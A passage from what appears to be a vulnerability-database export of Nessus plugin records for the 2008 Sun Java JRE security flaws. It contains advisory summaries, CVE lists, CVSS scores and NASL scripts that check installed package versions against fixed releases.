\"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif 
(!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-alsa-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-debuginfo-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-demo-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-devel-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u11-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"java-1_6_0-sun-plugin-1.6.0.u11-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-sun / java-1_6_0-sun-alsa / java-1_6_0-sun-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:50:05", "description": "The version of Sun Java Runtime Environment (JRE) installed on the\nremote host is earlier than 6 Update 11 / 5.0 Update 17 / 1.4.2_19 /\n1.3.1_24. Such versions are potentially affected by the following\nsecurity issues :\n\n - The JRE creates temporary files with insufficiently\n random names. 
(244986)\n\n - There are multiple buffer overflow vulnerabilities\n involving the JRE's image processing code, its \n handling of GIF images, and its font processing.\n (244987)\n\n - It may be possible for an attacker to bypass security \n checks due to the manner in which it handles the \n 'non-shortest form' of UTF-8 byte sequences.\n\n - There are multiple security vulnerabilities in Java \n Web Start and Java Plug-in that may allow for privilege\n escalation. (244988)\n\n - The JRE Java Update mechanism does not check the digital\n signature of the JRE that it downloads. (244989)\n\n - A buffer overflow may allow an untrusted Java \n application that is launched through the commandline to \n escalate its privileges. (244990)\n\n - A vulnerability related to deserializing calendar \n objects may allow an untrusted applet or application to\n escalate its privileges. (244991)\n\n - A buffer overflow affects the 'unpack200' JAR unpacking\n utility and may allow an untrusted applet or application\n to escalate its privileges with unpacking applets and \n Java Web Start applications. (244992)\n\n - The UTF-8 decoder accepts encodings longer than the \n 'shortest' form. Although not a vulnerability per se, \n it may be leveraged to exploit software that relies on \n the JRE UTF-8 decoder to reject the 'non-shortest form'\n sequence. (245246)\n\n - An untrusted applet or application may be able to list\n the contents of the home directory of the user running \n the applet or application. (246266)\n\n - A denial of service vulnerability may be triggered when\n the JRE handles certain RSA public keys. (246286)\n\n - A vulnerability may be triggered while authenticating\n users through Kerberos and lead to a system-wide denial\n of service due to excessive consumption of operating\n system resources. 
(246346)\n\n - Security vulnerabilities in the JAX-WS and JAXB packages\n where internal classes can be accessed may allow an \n untrusted applet or application to escalate privileges. \n (246366)\n\n - An untrusted applet or application when parsing zip\n files may be able to read arbitrary memory locations in\n the process that the applet or application is running.\n (246386)\n\n - The JRE allows code loaded from the local filesystem to\n access localhost. (246387)", "edition": 30, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2008-12-04T00:00:00", "title": "Sun Java JRE Multiple Vulnerabilities (244986 et al)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:jre"], "id": "SUN_JAVA_JRE_244986.NASL", "href": "https://www.tenable.com/plugins/nessus/35030", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35030);\n script_version(\"1.33\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \n \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \n \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \n \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\",\n \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \n \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \n \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \n \"CVE-2008-5359\", \"CVE-2008-5360\");\n 
script_bugtraq_id(30633, 32608, 32620, 32892);\n\n script_name(english:\"Sun Java JRE Multiple Vulnerabilities (244986 et al)\");\n script_summary(english:\"Checks version of Sun JRE\"); \n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a runtime environment that is\naffected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of Sun Java Runtime Environment (JRE) installed on the\nremote host is earlier than 6 Update 11 / 5.0 Update 17 / 1.4.2_19 /\n1.3.1_24. Such versions are potentially affected by the following\nsecurity issues :\n\n - The JRE creates temporary files with insufficiently\n random names. (244986)\n\n - There are multiple buffer overflow vulnerabilities\n involving the JRE's image processing code, its \n handling of GIF images, and its font processing.\n (244987)\n\n - It may be possible for an attacker to bypass security \n checks due to the manner in which it handles the \n 'non-shortest form' of UTF-8 byte sequences.\n\n - There are multiple security vulnerabilities in Java \n Web Start and Java Plug-in that may allow for privilege\n escalation. (244988)\n\n - The JRE Java Update mechanism does not check the digital\n signature of the JRE that it downloads. (244989)\n\n - A buffer overflow may allow an untrusted Java \n application that is launched through the commandline to \n escalate its privileges. (244990)\n\n - A vulnerability related to deserializing calendar \n objects may allow an untrusted applet or application to\n escalate its privileges. (244991)\n\n - A buffer overflow affects the 'unpack200' JAR unpacking\n utility and may allow an untrusted applet or application\n to escalate its privileges with unpacking applets and \n Java Web Start applications. (244992)\n\n - The UTF-8 decoder accepts encodings longer than the \n 'shortest' form. 
Although not a vulnerability per se, \n it may be leveraged to exploit software that relies on \n the JRE UTF-8 decoder to reject the 'non-shortest form'\n sequence. (245246)\n\n - An untrusted applet or application may be able to list\n the contents of the home directory of the user running \n the applet or application. (246266)\n\n - A denial of service vulnerability may be triggered when\n the JRE handles certain RSA public keys. (246286)\n\n - A vulnerability may be triggered while authenticating\n users through Kerberos and lead to a system-wide denial\n of service due to excessive consumption of operating\n system resources. (246346)\n\n - Security vulnerabilities in the JAX-WS and JAXB packages\n where internal classes can be accessed may allow an \n untrusted applet or application to escalate privileges. \n (246366)\n\n - An untrusted applet or application when parsing zip\n files may be able to read arbitrary memory locations in\n the process that the applet or application is running.\n (246386)\n\n - The JRE allows code loaded from the local filesystem to\n access localhost. 
(246387)\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019736.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019737.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019738.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019739.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019740.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019741.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019742.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019759.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019793.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019794.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019797.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019798.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019799.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019800.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/6u11-139394.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/releasenotes-142123.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/releasenotes-138306.html\" );\n 
script_set_attribute(attribute:\"solution\", value:\n\"Update to Sun Java JDK / JRE 6 Update 11, JDK / JRE 5.0 Update 17, \nSDK / JRE 1.4.2_19, or SDK / JRE 1.3.1_24 or later and \nremove if necessary any affected versions.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2008/12/03\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sun_java_jre_installed.nasl\");\n 
script_require_keys(\"SMB/Java/JRE/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\n# Check each installed JRE.\ninstalls = get_kb_list(\"SMB/Java/JRE/*\");\nif (isnull(installs)) exit(1, \"The 'SMB/Java/JRE/' KB item is missing.\");\n\ninfo = \"\";\nvuln = 0;\ninstalled_versions = \"\";\n\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"SMB/Java/JRE/\";\n if (ver =~ \"^[0-9.]+\")\n installed_versions = installed_versions + \" & \" + ver;\n if (\n ver =~ \"^1\\.6\\.0_(0[0-9]|10)([^0-9]|$)\" ||\n ver =~ \"^1\\.5\\.0_(0[0-9]|1[0-6])([^0-9]|$)\" ||\n ver =~ \"^1\\.4\\.([01]_|2_(0[0-9]|1[0-8]([^0-9]|$)))\" ||\n ver =~ \"^1\\.3\\.(0_|1_([01][0-9]|2[0-3]([^0-9]|$)))\"\n )\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.6.0_11 / 1.5.0_17 / 1.4.2_19 / 1.3.1_24\\n';\n }\n}\n\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n installed_versions = substr(installed_versions, 3);\n if (\" & \" >< installed_versions)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:22", "description": "The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. 
(CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-375)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc", "p-cpe:/a:novell:opensuse:java-1_5_0-sun", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin"], "id": "SUSE_11_1_JAVA-1_5_0-SUN-081217.NASL", "href": "https://www.tenable.com/plugins/nessus/40235", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_5_0-sun-375.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40235);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", 
\"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-375)\");\n script_summary(english:\"Check for the java-1_5_0-sun-375 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=456770\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch 
!~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-alsa-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-devel-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-plugin-1.5.0_update17-1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun / java-1_5_0-sun-alsa / java-1_5_0-sun-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:06:22", "description": "Updated java-1.5.0-sun packages that correct several security issues\nare now available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Java Runtime Environment (JRE) contains the software and tools\nthat users need to run applets and applications written using the Java\nprogramming language.\n\nA vulnerability was found in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute\narbitrary code. (CVE-2008-2086)\n\nAdditionally, these packages fix several other vulnerabilities. 
These\nare summarized in the 'Advance notification of Security Updates for\nJava SE' from Sun Microsystems.\n\nUsers of java-1.5.0-sun should upgrade to these updated packages,\nwhich correct these issues.", "edition": 28, "published": "2009-08-24T00:00:00", "title": "RHEL 4 / 5 : java-1.5.0-sun (RHSA-2008:1025)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-08-24T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-src", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-plugin", "cpe:/o:redhat:enterprise_linux:5.2", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-demo", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-sun-devel"], "id": "REDHAT-RHSA-2008-1025.NASL", "href": "https://www.tenable.com/plugins/nessus/40732", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:1025. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40732);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_bugtraq_id(32620, 32892);\n script_xref(name:\"RHSA\", value:\"2008:1025\");\n\n script_name(english:\"RHEL 4 / 5 : java-1.5.0-sun (RHSA-2008:1025)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.5.0-sun packages that correct several security issues\nare now available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Java Runtime Environment (JRE) contains the software and tools\nthat users need to run applets and applications written using the Java\nprogramming language.\n\nA vulnerability was found in in Java Web Start. If a user visits a\nmalicious website, an attacker could misuse this flaw to execute\narbitrary code. (CVE-2008-2086)\n\nAdditionally, these packages fix several other vulnerabilities. 
These\nare summarized in the 'Advance notification of Security Updates for\nJava SE' from Sun Microsystems.\n\nUsers of java-1.5.0-sun should upgrade to these updated packages,\nwhich correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2086\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5341\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5344\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5349\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://access.redhat.com/security/cve/cve-2008-5353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5357\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-5360\"\n );\n # http://blogs.sun.com/security/entry/advance_notification_of_security_updates3\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c8d7aabf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:1025\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
